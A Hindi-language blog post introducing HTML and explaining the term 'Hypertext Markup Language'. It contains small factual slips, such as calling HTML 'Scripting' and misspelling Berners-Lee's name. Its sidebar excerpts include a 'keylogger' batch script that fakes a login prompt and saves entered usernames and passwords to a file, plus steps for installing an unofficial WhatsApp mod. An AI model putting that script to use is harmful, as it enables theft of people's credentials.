Skip to main content

Learn What is HTML in Hindi

Hello friends...
Learn What is HTML in Hindi
HTML का Introduction Hindi में दे रहा हूं
उम्मीद है आपको पसंद आएगा
HTML से Website या Web Application
बनाये जाते है यदि आप अपनी खुद
की Website बनाना चाहते है और
पैसे कमाना चाहते है तो HTML से अच्छा और
सरल कोई रास्ता नहीं है यदि आपएक
सफल Web Designer या Web Developer
बनाना चाहते है, तो HTML को बहुत अच्छे से
सीखना आपके लिए जरुरी
है, क्योंकि इसमें HTML जड़ का काम करेगा और
जितना जड़ को पानी दोगे यानि जितना अच्छे
से आप HTML सीखोगे आपका Web
Developing का ज्ञान बढ़ता जायेगा लोग अक्सर
सोचते है की एक Website बनाना
बहुत मुश्किल काम है पर ऐसा नहीं
है हर कोई एक Website बनाना
सीख सकता है बस आप में लगन
होनी चाहिए HTML बहुत सरल
भाषा है इसको सीखना कोई
बड़ी बात नहीं है
HTML से Website बनाना बहुत सरल है और
यह नि: शुल्क है इसमें किसी
Software की भी जरुरत
नहीं पड़ती.
HTML का पूरा नाम Hypertext Markup
Language और यह Web पर सबसे व्यापक रूप
से इस्तेमाल होने वाली Language
है यह कोई Programming Language
नहीं है यह एक Markup
Language है.
इस Blog की मदद से में आपको
HTML के सभी Tags और Element
एक एक करके समझाता जाऊंगा जिससे आपको यह
आसानी से समझ आएगा और आप
जल्दी ही इसे
सीख जायेंगे.
अब आपको यह तो पता चल गया की
HTML से Website बनाई जाती है
आइये Hypertext Markup Language का
मतलब जानते है.
Hyper यह बताता है HTML में आनेवाला
Text एक पुस्तक की तरह
Liner (एक ही दिशा में)
नहीं होता है. इसका अर्थ है
की जब आप इंटरनेट पर काम कर
रहे होते है और आपको अपनी
रूचि वाला कोई Page देखना है तो आप
सीधे है वह पर तुरंत पहुंच
सकते है. यह कार्य hyperlink के द्वारा
होता है? इसका अर्थ यह है
की इंटरनेट पर दस्तावेजो को देखने का
कोई निर्धारित क्रम नहीं होता
है. (एक पुस्तक की तरह)
Hyper शब्द Liner का एकदम अलग है!
Liner का अर्थ होता है किसी
भी काम को करने का एक क्रम जैसे
"आपको यह कर पाने से पहले यह करना
ही होगा!" HTML में यह
नहीं होता और आप WWW पर
कोई भी Page कभी
भी देख सकते है.
Text यह बताता है की हम
जिन Files पर काम करते है उनमे केवल
Text ही लिखा जा सकता है.
Markup का मतलब है की
Web Page बनाने के लिए हम सबसे पहले
Text Type करते है, उसके बाद उस Text
की Marking करते है! या ऐसे
समझे की हमे HTML Coding
करते समय यह बताना होता है
की कौनसा Text Bold किया जाना
है, कहा पर कोई Image लगानी
है, यह काम आप Tags लगा के करते है,
Tags, web browser को Page दिखाते समय
यह निर्देश देते है की इस Page
को कैसे Display करना है.
Language का मतलब है की
हम अपना काम करने के लिए एक Language
को उस के सभी के Syntexs के साथ
काम में ले रहे है! यहाँ ध्यान देना
जरुरी है की यह कोई
Programming Language
नहीं है! यह एक Scripting
है! जिसमे Marking के द्वारा Web
Document के Appearance को Control
किया जाता है! internet के लिए HTML
की खोज Team berners-Lee ने
की थी.
Jayantsmarty8@gmail.com

Comments

Popular posts from this blog

create keylogger using notepad:

create keylogger using notepad: Step 1: The first step for notepad keylogger is to open a notepad of your Windows OS by pressing the Windows button in you computer. Then you need to click on the notepad option. Step 2: Once the notepad opens, you need to copy and paste the below given codes into it to make a keylogger in notepad. Make sure that there are no empty or extra spaces between the characters and sentences: @echo off color a title Login cls echo Please Enter Your Email Address And Password echo. echo. cd “C:\Logs” set /p user=Username: set /p pass=Password: echo Username=”%user%” Password=”%pass%” >> Log.txt start >>Program Here<< exit create keylogger using notepad Step 3: Once you have written the code, then you would need to save the given notepad file as logs.bat in the given desktop. notepad keylogger Step 4: After that you would need to create a new folder called logs. Here one thing that you need to keep in mind is that the...

Albert - Einstein ki life story in hindi..

HELLO FRIENDS. AJ HUM US SCIENTIST KI BARE ME KCH JANEGE JINSE HAME BHOT PRERNA MILTI HAI OR UNHONE ye proof kar k bata dia ki KOI BHI INSAAN KISI SE KAM NAI HOTA HAI BUS USE DRAD SANKALP KI JARURT HOTI HAI JISSE VO APNI LIFE AAGE BAD SAKE AJ AISE HI MAHAn SCIENTIST ALBERT-EINSTEIN KE BARE ME PADENGE JINHONE HAME BHOT ACHHA MASSEGE DIA HAI TO ME ISE HINDI OR ENGLISH DONO VERSION ME LIKH RAHA HU .. सबसे पीछे रहने वाले एक बालक ने अपने गुरु से पूछा ‘श्रीमान मैं अपनी बुद्धी का विकास कैसे कर सकता हूँ?’ The backwards-a boy asked his teacher, "Sir, how can I develop my genius?" अध्यापक ने कहा – अभ्यास ही सफलता का मूलमंत्र है। Teacher says that - Practice is the key to success.. उस बालक ने इसे अपना गुरु मंत्र मान लिया और निश्चय किया कि अभ्यास के बल पर ही मैं एक दिन सबसे आगे बढकर दिखाऊँगा। बाल्यकाल से TEACHARO द्वारा मंद बुद्धी और अयोग्य कहा जाने वाला ये बालक अपने अभ्यास के बल पर ही विश्व में आज सम्मान के साथ जाना जाता है। इस बालक को दुनिया आइंस्टाइन के नाम से जानती ह...

Use dual whtsaap in one android cell

1. First take the full backup for your messages and data before going through ogwhatsapp do h dwnload 2015 & whatsmapp solo apk: 2. Clear whatsApp data (Go to App Info and click on Clear Data button as shown in below snapshot): 3. Go to /sdcard/WhatsApp folder and rename it to /sdcard/OGWhatsApp (You can use any file viewer or file explorer, below is ES File Explorer). Remember this step is only required to install ogwhatsapp apk latest version 2015, no need in whatsmapp solo apk. 4. Now uninstall Official whatsapp application from your android device. 5. Install ogwhatsapp apk latest version 2015 in google. 6. It will ask for your mobile number. Give the old number which you have installed in official Whatsapp earlier [IMPORTANT]. 7. Click OK. 8. Now your Ogwhatsapp application is ready for old number. 9. For second number to use, go to play store and download official WhatsApp application. 10. It will ask for your number. Insert your new s...